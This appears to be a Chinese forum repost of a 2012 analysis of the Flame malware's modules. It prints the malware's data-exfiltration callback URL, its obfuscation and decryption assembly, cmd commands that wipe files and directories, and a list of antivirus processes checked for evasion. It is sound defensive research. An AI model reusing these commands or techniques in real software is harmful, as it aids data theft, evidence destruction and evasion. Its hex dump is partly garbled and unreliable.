3.6Wusetupv.exe模块分析
Wusetupv.exe是“火焰”病毒运行后释放的病毒文件之一,我们通过对此模块的分析了解到,此模块是用来收集本机各个接口的信息,进程信息,注册表键值信息。该样本使用MITM方法,利用了微软的数字签名漏洞。
图3-26Flame使用微软数字签名
图3-27Flame使用微软数字签名
Wusetupv.exe运行后创建互斥量"WPA_NTOS_MUTEX"。
查找"C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\~DHF593.tmp"文件,并读取文件内容。
尝试下载文件存储为"C:\WINDOWS\temp\~ZFF042.tmp"(猜测下载的就是Flame的主模块“mssecmgr.ocx”)
图3-28下载文件
图3-29存储为"C:\WINDOWS\temp\~ZFF042.tmp"
从操作系统的MIB库中读出本机各个接口的当前信息,如接口数目、类型、速率、物理地址、接收/发送字节数、错语字节数等。
图3-30收集本机各个接口信息
收集本机进程信息,加密后作为参数回传。
图3-31收集进程信息并加密
创建指定格式的URL回传主机信息:
http://MSHOME-<STRING>/view.php?mp=1&jz=<STRING>&fd=<STRING>&am=<STRING>&ef=<STRING>&pr=<STRING>&ec=<STRING>&ov=<STRING>&pl=<STRING>
Jz参数是随机创建的,主要功能代码如下:
图3-32创建Jz参数的函数代码
am参数是MAC地址,与0x55异或加密(如下图)。
图3-33MAC地址的加密函数
ef参数是IP地址,与0x44异或加密(如下图)。
图3-34IP地址的加密函数
ov参数是加密后的系统版本号。
Pl参数是加密后的进程列表。
加密方式采用简单的替换,列表如下:
hXk1Qrbf6VH~29SMYAsCF-q7Omad0eGLojWi.DyvK8zcnZxRTUpwE_B5tuNPIJgl43ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789_-.
查询系统注册表
HKEY_CURRENT_USER\Console:StandardSize
SYSTEM\CurrentControlSet\Control\TimeZoneInformation:StandardDateBias
查看系统注册表中是否有KasperskyLab项判断多个版本:
"HKLM\SOFTWARE\KasperskyLab\AVP6"
"HKLM\SOFTWARE\KasperskyLab\protected\AVP7"
"HKLM\SOFTWARE\KasperskyLab\protected\AVP8" 本帖最后由 wobaxindiule 于 2012-8-2 16:29 编辑
3.7Boot32drv.sys解密分析
Boot32drv.sys是一个加密数据文件并不是PE文件,加密方式是通过与0xFF做xor操作。加密文件如下:
图3-35加密的“Boot32drv.sys”的文件内容
解密代码如下:
pop esi ; To decrypt data address
mov edi,esi ; To decrypt data address
pop ecx ; To decrypt the length of the data
_lib:
cmp ecx,0
jz_end
lodsb
xoral,255
dec ecx
stosb
jmp _lib
_end:
解密后的数据如下:
001529A800 0A 00 00 00 01 01DC 03 00 00 01 90 01 00 1B.....?..?.001529B831 B3 C1 FF FF FF FFFF FF FF 02 04 00 00 00 B91沉?? 001529C804 00 00 1E 9B C6 2B06 04 00 00 00 40 77 1B 00浧w.001529D8AC 8E C5 72 03 48 0000 00 27 00 00 00 00 00 00瑤舝H...'......001529E800 FF FE 52 00 45 0041 00 52 00 5F 00 57 00 49.寸昀漀渀琀=宋体]寨/font].E.A.R._.W.I001529F800 4E 00 44 00 4F 0057 00 2E 00 44 00 45 00 53 .N.D.O.W...D.E.S00152A0800 4B 00 54 00 4F 0050 00 5F 00 53 00 41 00 4D .K.T.O.P._.S.A.M00152A1800 50 00 4C 00 45 005F 00 52 00 41 00 54 00 45 .P.L.E._.R.A.T.E00152A2800 F1 62 CA E6 FF FFFF FF FF FF FF FF FF FF 06.馼舒00152A3804 00 00 00 C0 D4 0100 75 21 8F F4 03 46 00 00涝.u!忯F..00152A4800 8F 00 00 00 34 0000 00 FF FE 52 00 45 00 41.?..4...寸昀漀渀琀=宋体]寨/font].E.A00152A5800 52 00 5F 00 57 0049 00 4E 00 44 00 4F 00 57.R._.W.I.N.D.O.W00152A6800 2E 00 57 00 49 004E 00 44 00 4F 00 57 00 5F ...W.I.N.D.O.W._00152A7800 53 00 41 00 4D 0050 00 4C 00 45 00 5F 00 52 .S.A.M.P.L.E._.R00152A8800 41 00 54 00 45 00FF EC 98 63 FF FF FF FF FF.A.T.E.寸昀漀渀琀=宋体]鞓c00152A98FF FF FF FF FF FF FF06 04 00 00 00 00 00 00 00???????????????00152AA8DE 63 59 11 03 66 0000 00 F7 00 00 00 9C 00 00辌Yf...?..?.00152AB800 FF FE 52 00 45 0041 00 52 00 5F 00 57 00 49.寸昀漀渀琀=宋体]寨/font].E.A.R._.W.I00152AC800 4E 00 44 00 4F 0057 00 2E 00 4E 00 4F 00 54 .N.D.O.W...N.O.T00152AD800 5F 00 49 00 4E 0054 00 45 00 52 00 45 00 53 ._.I.N.T.E.R.E.S00152AE800 54 00 49 00 4E 0047 00 5F 00 50 00 52 00 4F .T.I.N.G._.P.R.O00152AF800 43 00 45 00 53 0053 00 45 00 53 00 5F 00 49 .C.E.S.S.E.S._.I00152B0800 4E 00 54 00 45 0052 00 56 00 41 00 4C 00 44 .N.T.E.R.V.A.L.D00152B18E5 9E 9F FF FF FF FFFF FF 06 04 00 00 00 00 00鍨????????????00152B2800 00 DE 63 59 11 0356 00 00 00 79 01 00 00 04..辌YV...y??????00152B3801 00 00 FF FE 52 0045 00 41 00 52 00 5F 00 57..寸昀漀渀琀=宋体]寨/font].E.A.R._.W00152B4800 49 00 4E 00 44 004F 00 57 00 2E 00 49 00 4E .I.N.D.O.W...I.N00152B5800 54 00 45 00 52 0045 00 53 00 54 00 49 00 4E .T.E.R.E.S.T.I.N00152B6800 47 00 5F 00 50 0052 00 4F 00 43 00 45 00 53.G._.P.R.O.C.E.S00152B7800 53 00 45 00 53 002E 00 73 00 69 00 7A 00 65 .S.E.S...s.i.z.e?00152B8800 F4 2A D4 62 FF FFFF FF FF FF FF FF FF 06 04.?詁???????00152B9800 00 00 00 00 00 00DE 63 59 11 03 58 00 00 00.......辌YX...00152BA8EE 01 00 00 86 01 0000 FF FE 52 00 45 00 41 00?..?..寸昀漀渀琀=宋体]寨/font].E.A.00152BB852 00 5F 00 57 00 4900 4E 00 44 00 4F 00 57 00 R._.W.I.N.D.O.W.00152BC82E 00 49 00 4E 00 5400 45 00 52 00 45 00 53 00 ..I.N.T.E.R.E.S.00152BD854 00 49 00 4E 00 4700 5F 00 50 00 52 00 4F 00 T.I.N.G._.P.R.O.00152BE843 00 45 00 53 00 5300 45 00 53 00 2E 00 66 00 C.E.S.S.E.S...f.00152BF869 00 72 00 73 00 7400 98 6B 24 F8 FF FF FF FFi.r.s.t.榢$?00152C08FF FF FF 06 04 00 0000 00 00 00 00 DE 63 59 11辌Y00152C1803 56 00 00 00 63 0200 00 FB 01 00 00 FF FE 52V...c..?..寸昀漀渀琀=宋体]寨/font]00152C2800 45 00 41 00 52 005F 00 57 00 49 00 4E 00 44 .E.A.R._.W.I.N.D00152C3800 4F 00 57 00 2E 0049 00 4E 00 54 00 45 00 52 .O.W...I.N.T.E.R00152C4800 45 00 53 00 54 0049 00 4E 00 47 00 5F 00 50 .E.S.T.I.N.G._.P00152C5800 52 00 4F 00 43 0045 00 53 00 53 00 45 00 53 .R.O.C.E.S.S.E.S00152C6800 2E 00 6C 00 61 0073 00 74 00 C5 77 91 31 FF...l.a.s.t.舧?00152C78FF FF FF FF FF FF FFFF 06 04 00 00 00 01 00 00………………00152C8800 BB 04 E5 A9 03 5600 00 00 D8 02 00 00 70 02.?濠V...?..p00152C9800 00 FF FE 52 00 4500 41 00 52 00 5F 00 57 00..寸昀漀渀琀=宋体]寨/font].E.A.R._.W.00152CA849 00 4E 00 44 00 4F00 57 00 2E 00 49 00 4E 00 I.N.D.O.W...I.N.00152CB854 00 45 00 52 00 4500 53 00 54 00 49 00 4E 00 T.E.R.E.S.T.I.N.00152CC847 00 5F 00 50 00 5200 4F 00 43 00 45 00 53 00 G._.P.R.O.C.E.S.00152CD853 00 45 00 53 00 2E00 66 00 72 00 65 00 65 00 S.E.S...f.r.e.e.00152CE839 8A 88 A6 FF FF FFFF FF FF FF FF FF 06 04 009妶 ?.??.....00152CF800 00 00 00 00 00 DE63 59 11 03 50 00 00 00 4D......辌Y???P...M00152D0803 00 00 E5 02 00 00FF FE 52 00 45 00 41 00 52..?..寸昀漀渀琀=宋体]寨/font].E.A.R00152D1800 5F 00 57 00 49 004E 00 44 00 4F 00 57 00 2E ._.W.I.N.D.O.W..00152D2800 49 00 4E 00 54 0045 00 52 00 45 00 53 00 54 .I.N.T.E.R.E.S.T00152D3800 49 00 4E 00 47 005F 00 54 00 49 00 54 00 4C .I.N.G._.T.I.T.L00152D4800 45 00 53 00 2E 0073 00 69 00 7A 00 65 00 BE .E.S...s.i.z.e.00152D5897 A6 8A FF FF 06 0400 00 00 00 00 00 00 DE 63棪?.......辌00152D6859 11 06 04 00 00 0000 00 00 00 DE 63 59 11 06Y.......辌Y00152D7804 00 00 00 01 00 0000 BB 04 E5 A9 0C 1E 00 00......?濠...00152D8800 00 00 00 00 A3 C40C 69 FF FF FF FF FF FF FF.....D.i00152D98FF FF FF FF FF FF FFFF FF FF FF FF FF FF FF FF00152DA8FF FF FF 03 52 00 0000 B5 03 00 00 5A 03 00 00勸...?..Z..00152DB8FF FE 52 00 45 00 4100 52 00 5F 00 57 00 49 00寸昀漀渀琀=宋体]寨/font].E.A.R._.W.I.00152DC84E 00 44 00 4F 00 5700 2E 00 49 00 4E 00 54 00 N.D.O.W...I.N.T.00152DD845 00 52 00 45 00 5300 54 00 49 00 4E 00 47 00 E.R.E.S.T.I.N.G.00152DE85F 00 54 00 49 00 5400 4C 00 45 00 53 00 2E 00 _.T.I.T.L.E.S...00152DF866 00 69 00 72 00 7300 74 00 B1 7F F6 66 03 50f.i.r.s.t.?鰂P00152E0800 00 00 C2 03 00 0003 04 00 00 FF FE 52 00 45...?....寸昀漀渀琀=宋体]寨/font].E00152E1800 41 00 52 00 5F 0057 00 49 00 4E 00 44 00 4F .A.R._.W.I.N.D.O00152E2800 57 00 2E 00 49 004E 00 54 00 45 00 52 00 45 .W...I.N.T.E.R.E00152E3800 53 00 54 00 49 004E 00 47 00 5F 00 54 00 49.S.T.I.N.G._.T.I00152E4800 54 00 4C 00 45 0053 00 2E 00 6C 00 61 00 73 .T.L.E.S...l.a.s00152E5800 74 00 8C 30 08 74FF FF 03 50 00 00 00 CF 03.t.?t僸...?00152E680000 5E 04 00 00 FFFE 52 00 45 00 41 00 52 00..^..寸昀漀渀琀=宋体]寨/font].E.A.R.00152E785F 00 57 00 49 00 4E00 44 00 4F 00 57 00 2E 00 _.W.I.N.D.O.W...00152E8849 00 4E 00 54 00 4500 52 00 45 00 53 00 54 00 I.N.T.E.R.E.S.T.00152E9849 00 4E 00 47 00 5F00 54 00 49 00 54 00 4C 00 I.N.G._.T.I.T.L.00152EA845 00 53 00 2E 00 6600 72 00 65 00 65 00 62 62 E.S...f.r.e.e.bb00152EB891 78 FF FF 憍寸昀漀渀琀=宋体]
整理后得到的明文字符串列表如下:
EAR_WINDOWDESKTOP_SAMPLE_RATE
EAR_WINDOWWINDOW_SAMPLE_RATE
EAR_WINDOWNOT_INTERESTING_PRCESSES_INTERVALD
EAR_WINDOWINTERESTING_PROCESSESsize
EAR_WINDOWINTERESTING_PROCESSESfirst
EAR_WINDOWINTERESTING_PROCESSESlast
EAR_WINDOWINTERESTING_PROCESSESfree
EAR_WINDOWINTERESTING_TITLESsize
EAR_WINDOWINTERESTING_TITLESfirst
EAR_WINDOWINTERESTING_TITLESlast
EAR_WINDOWINTERESTING_TITLESfree 本帖最后由 wobaxindiule 于 2012-8-2 16:30 编辑
3.8 Browse32.ocx模块分析
Browse32.ocx是“火焰”病毒运行后从远程服务器下载的模块,我们通过对此模块的分析了解到,些模块是用来删除恶意软件所有痕迹,防止取证分析。Browse32.ocx运行后会把恶意软件创建的所有文件写入垃圾字符覆盖,然后再删除这些文件,以防止任何人获得感染有关的信息的磁盘。
1.获取系统版本信息,遍历系统进程信息。
2.清理文件痕迹操作:获取文件属性,文件列表参见附录五(详见附录五:Browse32.ocx模块遍历计算机系统中是否有如下文件列表),然后设置文件属性为normal,获取文件大小,如果不为空,则根据文件大小,写入同样字节数的垃圾数据覆盖,然后再写入00数据覆盖(防止文件恢复)。
3.创建进程执行命令:"C:\WINDOWS\system32\cmd.exe" /crd /s /q "C:\Program Files\Common Files\MicrosoftShared\MSSecurityMgr""C:\WINDOWS\system32\cmd.exe" /crd /s /q "C:\Program Files\Common Files\MicrosoftShared\MSAudio"" "C:\WINDOWS\system32\cmd.exe" /crd /s /q "C:\Program Files\Common Files\MicrosoftShared\MSAuthCtrl"" "C:\WINDOWS\system32\cmd.exe" /crd /s /q "C:\Program Files\Common Files\MicrosoftShared\MSSndMix"" "C:\WINDOWS\system32\cmd.exe"/cdel/q /f C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\~*" "C:\WINDOWS\system32\cmd.exe" /cdel /q /f C:\WINDOWS\system32\ssi*" "C:\WINDOWS\system32\cmd.exe" /cdel /q /f C:\WINDOWS\system32\aud*" "C:\WINDOWS\system32\cmd.exe" /cdel /q /f C:\WINDOWS\system32\tok*" "C:\WINDOWS\system32\cmd.exe" /cdel /q /f C:\WINDOWS\system32\lrl*"
4.清理注册表操作:动态调用注册表相关函数函数查看并删除注册表键值HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Lsa:AuthenticationPackages:”mssecmgr.ocx”重复设置随机键值(A开头字母数字结合9位),并删除。HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\TimeZoneInformation:StandardSize:文件中发现大量对如下算法的调用。算法的运算方法如下:M=(0xbh+N)*(N+0xbh+0xch)注:N是要解密的字符距起始字符的距离。AL=(M1)^(M2)^(M3)^(M4)Decrypteddata = Encrypted data – AL解密时,用密文减去该密钥,即可得到明文。
图3-36AL=(M1)^(M2)^(M3)^(M4)
解密数据代码:
该函数没有明参数,数据的传递是通过寄存器edx和eax传递的两个隐参数。
0x1000C826proc near
test edx, edx
push esi
mov esi, eax
jbe short 0x1000C860
push ebx
push edi
push 0Bh
pop edi
sub edi,esi
0x1000C834:
lea ecx, [edi+esi]
lea eax, [ecx+0Ch]
imul eax, ecx ; (0xbh+N)*(N+0xbh+0xch)
add eax, dword_10067168
mov ecx,eax
shr ecx,18h
mov ebx,eax
shr ebx,10h
xor cl,bl
mov ebx,eax
shr ebx,8
xor cl,bl
xor cl,al
sub [esi],cl
inc esi
dec edx
jnz short0x1000C834
pop edi pop ebx
0x1000C860:
pop esi
retn
0x1000C826endp
对该函数的调用有2个。
调用1代码如下:
0x1000C8A8 proc near push ebp mov ebp,esp push ebx push esi push edi mov eax, eax push ebx push eax pop eax pop ebx push popa mov esi, [ebp+8] cmp word ptr [esi+10h],0 jnz short 0x1000C8C9 mov al,al mov ah,ah lea eax, [esi+14h]
jmp short 0x1000C8E90x1000C8C9: movzx edx, word ptr [esi+12h] lea ebx,[esi+14h] mov eax,ebx call 0x1000C826 and wordptr[esi+10h], 0 cmp eax,0 jz short 0x1000C8E nop mov edi,edi nop
0x1000C8E5: mov esi,esi mov eax,ebx
0x1000C8E9: pop edi pop esi pop ebx pop ebp retn0x1000C8A8endp
1000C8A8函数被调用340次。
函数需要一个参数:
各个调用代码并无明显差异,随机取一处得到代码情况如下:
0x100010C6 push 0x10064C48
0x100010CB call 0x1000C8A8
从函数1000C8A8中可以发现压入的数据结构如下:
DWORD*4:unknow
WORD:sign
WORD:length:N
WORD*N:Encrypteddata
??:unknow
调用2代码如下:
0x1000C862 proc near push ebp mov ebp,esp push ebx push esi push edi mov eax,eax push ebx push eax pop eax pop ebx pusha popa move bx,[ebp+8] cmp byteptr[ebx+8],0 jnz short 0x1000C882 mov al, al mov ah, ah lea eax, [ebx+0Bh] jmp short0x1000C8A30x1000C882: movzx edx, wordptr[ebx+9] lea eax, [ebx+0Bh] mov [ebp+8],eax call 0x1000C826 cmp eax,0 jz short 0x1000C89A nop mov edi,edi nop0x1000C89A: mov esi,esi mov eax, [ebp+8] mov byteptr[ebx+8], 00x1000C8A3: pop edi pop esi pop ebx pop ebp retn0x1000C862 endp
函数1000C862被调用两次:
该函数需要一个参数:
各个调用代码并无明显差异,随机取一处得到代码如下:
0x1004046F push 0x1005C268
0x10040474 call 0x1000C862
从函数1000C862中可以发现压入的数据结构如下:
DWORD*2:unknowBYTE:signWORD:length:NWORD*N:Encrypted data??:unknow
本帖最后由 wobaxindiule 于 2012-8-2 16:11 编辑
3.9 Jimmy.dll模块分析
Jimmy.dll是“火焰”病毒运行后从146资源文件中释放出来的,我们通过对此模块的分析了解到,此模块的作用为收集用户计算机信息,包括窗体标题、注册表相关键值信息,计算机名,磁盘类型等。1.判断当前是否在调试模式,如果是则结束当前进程。
2.查找资源0xA3(163)、0xA4(164)并加载。
3.遍历C盘目录下文件,并判断文件类型,获取文件大小。
4.查找文件"C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\~c34.tmp",
并读取内容并做相应处理,而后删除此文件。
5.获取当前计算机名称。
6.查找文件%Temp%\~dra52.tmp,%WINDOWS%\temp\~a29.tmp。
7.获取注册键值信息
[*]HKLM\SYSTEM\CurrentControlSet\Control\TimeZoneInformation:StandardSize[*]HKEY_CLASSES_ROOT\CLSID\{98de59a0-d175-11cd-a7bd-00006b827d94}[*]HKLM\SOFTWARE\KasperskyLab\AVP6[*]HKLM\SOFTWARE\KasperskyLab\protected\AVP7
8.遍历以下进程:
[*]FCH32.EXE[*]PXConsole.exe[*]PXAgent.exe[*]Filemon.exe[*]fsav32.exe[*]FPAVServer.exe[*]fssm32.exe[*]FProtTray.exe[*]fspc.exe[*]fsdfwd.exe[*]fsguidll.exe[*]FAMEH32.EXE[*]fsqh.exe[*]FSMB32.EXE[*]FSMA32.EXE[*]fsgk32.exe[*]FSM32.EXE[*]fsgk32st.exe[*]jpfsrv.exe[*]procexp.exe[*]jpf.exe[*]SpywareTerminator.Exe[*]sp_rsser.exe[*]SpywareTerminatorShield.Exe[*]AntiHook.exe[*]procexp.exe[*]avp.exe
文件中发现大量对如下算法的调用。算法的运算方法如下:M=(0xbh+N)*(N+0xbh+0x6h)+0x58h注:N是要解密的字符距起始字符的距离。解密时,用密文减去该密钥,即可得到明文。AL=(M1)^(M2)^(M3)^(M4)
Decrypteddata = Encrypted data – AL
图3-37AL=(M1)^(M2)^(M3)^(M4)
解密数据代码:
0x1000D9DC proc near
test edx, edx
push esi
mov esi, eax
jbe short 0x1000DA13
push ebx
push edi
push 0Bh
pop edi
sub edi, esi
0x1000D9EA:
lea ecx, [edi+esi]
lea eax, [ecx+6]
imul eax,ecx
add eax,58h
mov ecx,eax
shr ecx, 18h
mov ebx, eax
shr ebx, 10h
xor cl, bl
mov ebx,eax
shr ebx, 8
xor cl, bl
xor cl,al
sub [esi],cl
inc esi
dec edx
jnz short0x1000D9EA
pop edi
pop ebx
0x1000DA13:
pop esi
retn
0x1000D9DC endp
0x1000D9DC函数被调用两次,调用位置如下:
第一处调用:
0x10016610procnear
cmp word ptr [esi+10h],0
jnz short 0x1001661B
lea eax, [esi+14h]
retn
0x1001661B:
movzx edx, wordptr [esi+12h]
push edi
leaedi [esi+14h]
mov eax,edi
call 0x1000D9DC
and word ptr [esi+10h],0
mov eax,edi
pop edi
retn
0x10016610endp
0x10016610函数被调用113次:
函数需要参数如下:
DWORD*4: unknowWORD:signWORD:length: NWORD*N:Encrypted data??:unknow
第二处调用:
0x1001A0EF procnear
movzx edx, wordptr[esi+9]
push edi
lea edi,[esi+0Bh]
mov eax,edi
call 0x1000D9DC
mov eax,edi
mov byte ptr[esi+8],0
pop edi
retn
0x1001A0EF endp
0x1001A0EF函数被调用4次:
函数需要参数如下:
DWORD*2:unknowBYTE:signWORD:length:NWORD*N: Encrypted data??:unknow
注:%System32%是一个可变路径.病毒通过查询操作系统来决定当前System文件夹的位置.
%Windir% WINDODWS所在目录
%DriveLetter% 逻辑驱动器根目录
%ProgramFiles% 系统程序默认安装目录
%HomeDrive% 当前启动的系统的所在分区
%Documents and Settings% 当前用户文档根目录
%Temp% \Documents and Settings\当前用户\Local Setti ngs\Temp
%System32% 系统的 System32文件夹 本帖最后由 wobaxindiule 于 2012-8-2 09:29 编辑
第4章 总结与展望
从近几年来包括Stuxnet,Duqu和Flame在内的恶意代码攻击事件中,我们可以清晰地看到,攻击者已经不再仅仅通过恶意代码的快速大范围传播获得技术成就感或者获得经济利益。当前的新趋势非常明显:恶意代码正成为APT攻击中最重要的一个因素。这些被用于APT攻击的恶意代码具有这些特点:1. 目的极其明确。攻击者不再追求恶意代码感染主机数,转而追求如何精准地命中特定目标,并有意识地避免其在非目标主机上存活,以延迟被发现的时间。2. 隐蔽性强,存活能力高。这些恶意代码会采用多种内核技术隐藏自身,采用有效的C&C通信方式来保证长期接受指令,采用数字证书避免被检测等。因此,Flame做到了攻击两年后才被发现。3. 代码复杂。此前的恶意代码家族,多为单一功能、类似实现,其变种大量采用自动生成的方式,其开发作为地下产业链的最上游环节,追求高效率实现。而此类恶意代码则通常由专门团队开发,不再追求批量生产,加之功能复杂多变,往往结构及其复杂。这给对其是否恶意的判定带来了不少困难。4. 大量利用零日漏洞。包括用于外网渗透、内网传播、最终攻击,这些恶意代码往往大量地利用各类零日漏洞,因此常规的系统安全保障方法受到挑战。5. 多平台性。这些恶意代码的运行环境既有MS-Office、Adobe Flash Player等文档软件,又有WinCC等工控系统环境,还包括MacOS系统、Java平台等非主流环境。当攻击者不再以广泛传播为目的,恶意代码可能运行的环境就具有了无限的可能。6. 攻击过程有序。从搜集资料,开发特定攻击代码,挖掘或购买漏洞,到渗透攻击,内网传播,远程控制等。攻击者有这样的耐心去一步步完成,实现一种让人叹为观止的攻击。在这些特点下,无论是传统的反病毒体系(包括反病毒厂商的后台流水处理体系和部署到用户的软硬件结合检测处置体系),还是传统的安全模型与安全实践,均将遭受严峻地挑战。比如,由于攻击的针对性,传统的恶意代码样本捕获体系难以奏效,实施上,这些被用于APT的恶意代码,最后往往是由用户上报至反病毒厂商;还是由于攻击的针对性,样本自动化分析和判定系统也面临失效的可能,无论是环境模拟还是行为触发,都难以实现完全的自动化;对多种环境的零日漏洞分析、漏洞修复也需要各方的积极配合。
此外,在此类恶意代码出现之前,反病毒厂商将各类资源集中在如何保护更多用户不被恶意代码攻击上,即专注于一般性恶意代码。这些资源既包括软硬件设施和后台系统,又包括对恶意代码的分析能力积累和技术知识储备。而当此类具有APT特点的恶意代码出现时,反病毒厂商难以再像以往那样做出快速的反应。例如,Kaspersky实验室对Stuxnet和Duqu的分析,就前后进行了几个月的时间。在这个问题上,攻击者可以从容不迫地花数年的时间熟悉和了解特定领域的知识,并展开攻击;而对反病毒厂商来说,与攻击者的差距在将来也许依然存在。即便从非技术的角度,在此类攻击中,安全厂商与用户也处于不利的地位。我们无从知道下一个目标会是谁,也不知道攻击目的是什么。事实上,面对这种由专门的、专业的团队,花费了多年时间和大笔金钱而展开的单点攻击,这种情况已经使我们陷入泥潭。在这种困境下,我们需要做的绝不仅仅是被动地发现、分析、检测并防御这些攻击。整个产业界有必要主动出击,展开基础研究、演练攻防实况、建立新的模型和方法、细粒度了解用户、形成新的有实效性的解决方案等等。而有效的防御体系,同样需要包括系统供应商、软件开发商、硬件制造商的支持与配合,需要所有信息系统使用者共同提高安全意识并付诸实践。攻击者永远会去挑战薄弱的环节,面对这些未知的、看起来强大的威胁,唯有主动、协作,能让我们更有信心。 本帖最后由 wobaxindiule 于 2012-8-2 10:17 编辑
第5章 附录
附录一
表5-1为Mssecmgr.ocx文件中的遍历安全进程列表,其列表和别它模块中的一些遍历进程列表中一些进程是相同的。
进程名称 说明
TSAnSrf.exeOmniquad AnonymousSurfing安全套件相关进程。
xauth_service.exe不详
fwsrv.exeJetico Personal Firewall进程一款全面而又简单易用的个人网络防火墙
kavmm.exeKaspersky Anti-VirusPersonal Pro 5 进程
acs.exeoutpost防火墙的正常进程
frzstate2k.exe冰点还原软件的进程
Fsguiexe.exeF-Secure反病毒软件相关程序。
Nvoy.exeNorman AntiVirus杀毒软件相关进程
SCANWSCS.exeQuick Heal Technologies公司QuickHeal反病毒软
zerospyware lite_installer.exeZeroSpyware相关组件进程
一款个人隐私防护软件
ICMON.exeSophos AntiVirus防毒检测的活动监视器进程
fsdfwd.exeF-Secure Anti-Virus相关组件进程
fsrt.exeFortres Security进程
Fsm32.exe是F-Secure反病毒软件的一部分。
bdmcon.exeSoftWin公司出品的BitDefender反病毒产品的一部分。
sab_wab.exeSUPERAntiSpyware相关组件进程
TScutyNT.exeOmniquad Ltd公司产品有关进程
blackd.exeBlackICE计算机防火墙的一部分。
VSDesktop.exeVirtual Sandbox 2.0Build 209子进程
DCSUserProt.exeDiamondCS ProcessGuard进程一款系统安全程序
authfw.exeAuthentium Firewall进程
app_firewall.exeNetScaler App Firewall进程
lpfw.exeLavasoft PersonalFirewall进程
FCH32.exeF-Secure Anti-Virus进程
ccEvtMgr.exeNorton Internet Security网络安全套装的一部分
xfilter.exe费尔防火墙的相关进程
Fsbwsys.exeF-secure反病毒软件的相关程序
jpf.exeJeticoPersonalFirewall是一款功能全面且简单易用的网络防护软件,可以有效确保计算机免受黑客侵扰
TSAtiSy.exeOmniquad AntiSpy软件进程
Fsgk32.exeF-Secure反病毒软件相关程序
fxsrv.exe不详
swupdate.exeSophos AntiVirus进程
almon.exeSophos AutoUpdate产品的一个进程
EMLPROXY.exeQuick Heal AntiVirus进程一款印度的著名安全软件
UmxTray.exeTinyFirewall相关进程。TinySoftware出品的一款网络防火墙软件
NetMon.exe是NetworkMonitor一款用于管理和监测网络状况的软件进程
Firewall 2004.exeWyvernWorks Firewall2004软件进程。
pgaccount.exe是关于个人帐户的进程项,当注销后用另一个帐户登录计算机,有可能会出现两个该进程项。
EMLPROUI.exeQuick Heal AntiVirus进程
xcommsvr.exeBitDefender反病毒产品相关程序
TMBMSRV.exeTMBMSRV.exe是趋势Trend Micro出品的PC-cillin反病毒软件的一部分。
umxcfg.exeTinyFirewall相关进程。TinySoftware出品的一款网络防火墙软件
Kpf4gui.exe是Kerio个人防火墙相关进程。
SpyHunter3.exeSpyHunter反间谍软件进程
NVCSCHED.exeNVCSched.exe是Norman病毒控制台计划任务程序
alsvc.exeSophos AntiVirus安全产品中的一个进程
avguard.exe是AntiVir个人版网络安全套装的一部分
Fssm32.exeF-Secure反病毒软件相关程序,用于扫描病毒
DFServEx.exeDeep Freeze5(冰点还原)的进程
live help.exeWindows32的应用程序相关进程
DF5ServerService.exeDeep Freeze5(冰点还原)的进程
bdss.exe是BitDefender反病毒软件的一部分。
sched.exeNVCSched.exe是Norman病毒控制台计划任务程序
jpfsrv.exeJeticoPersonalFirewall的服务进程。
PXConsole.exePrevx Home反间谍软件进程
ONLINENT.exeQuick Heal Total安全产品相关进程
SSUpdate.exeSUPERAntiSpyware 间谍扫描软件进程
SpywareTerminator.exeCrawler杀毒软件相关进程
ONLNSVC.exeF-Secure反病毒软件相关程序
mpsvc.exe微点主动防御进程
vsserv.exe是Bull Guard网络安全套装和BitDefender反病毒软件相关程序
cpf.exeComodoPersonalFirewall主程序。
UmxPol.exeTinyFirewall相关进程。TinyFirewall是由
RDTask.exe虚拟光碟相关程序。虚拟光碟是一套集成的CD/DVD刻录和光碟机模拟的软件。911CHA.com提供
TmPfw.exetmpfw.exe是趋势公司网络安全软件的一部分。
ike.exeFortiClient软件的SSL VPN服务
DFAdmin6.exe冰点还原精灵产品是的一个进程
asr.exeAdvanced_Spyware_Remover反间谍软件程序。
FWService.exePCToolsFirewallPlus的服务进程
protect.exeSafe'n'Sec 产品中的一个进程
NJEEVES.exeNorman反病毒产品的一部分
TMAS_OEMon.exeTrend Micro Anti-Spam中的一个进程
sp_rsser.exeSpywareTerminator反间谍软件相关程序。
WSWEEPNT.exeSophos Anti-Virus进程
ipcsvc.exeNetVeda Safety.Net安全软件进程。
UmxAgent.exeCA Anti-Virus相关服务进程
Umxlu.exeTinyFirewall相关进程。TinyFirewall是由TinySoftware出品的一款网络防火墙软件。
kav.exe卡巴斯基Kaspersky Anti-Virus反病毒产品进程
MPF.exe是McAfee网络安全套装软件相关进程,用于保护你的计算机免受网络蠕虫和病毒的威胁。
umxagent.exeCA Anti-Virus相关服务进程
avp.exe卡巴斯基Kaspersky Anti-Virus反病毒产品进程
TSmpNT.exeOmniquad MyPrivacy软件进程。
fsgk32st.exeF-Secure反病毒软件相关程序。
zlclient.exeZoneAlarm个人防火墙的客户端程序。
R-Firewall.exeR-Firewall个人防火墙进程。
sww.exe不详
umxtray.exeTinyFirewall相关进程。TinyFirewall是由TinySoftware出品的一款网络防火墙软件
ccApp.exe是Norton AntiVirus 2003反病毒软件的一部分。它能够自动保护你的计算机安全。
avpm.exe卡巴斯基Kaspersky公司出品的反病毒套装的一部分
smc.exe是Norton AntiVirus 反病毒软件的一部分。它能够自动保护你的计算机安全。
PF6.exePrivatefirewall相关进程
ipcTray.exeNetVeda Safety.Net安全软件进程。
fsaua.exe该进程属于F-Secure公司的自动更新代理
fsqh.exeF-secure反病毒软件的隔离管理工具
R-firewall.exeR-Firewall个人防火墙进程
pcipprev.exe防火墙软件
blackice.exeBlackICE 是一款防火墙软件,blackice.exe为主要进程。
ekrn.exe是ESET Smart Security或ESET NOD32 Antivirus反病毒软件相关程序
configmgr.exeIBM Case Manager中进程。
ipatrol.exe互联网安全联盟,安全软件
savadminservice.exeSophosAnti-Virus(SAV)是一款英国的防毒软件的一部分
alupdate.exe是系统正常运转、各种办公软件、游戏运行所不可或缺的重要文件
Zanda.exeNorman反病毒产品控制程序,同时是驻留精灵程序。
nstzerospywarelite.exe反间谍软件的一部分
AdoronsFirewall.exeAdorons防火墙应用程序一部分
vsmon.exeZoneAlarm个人防火墙的一部分
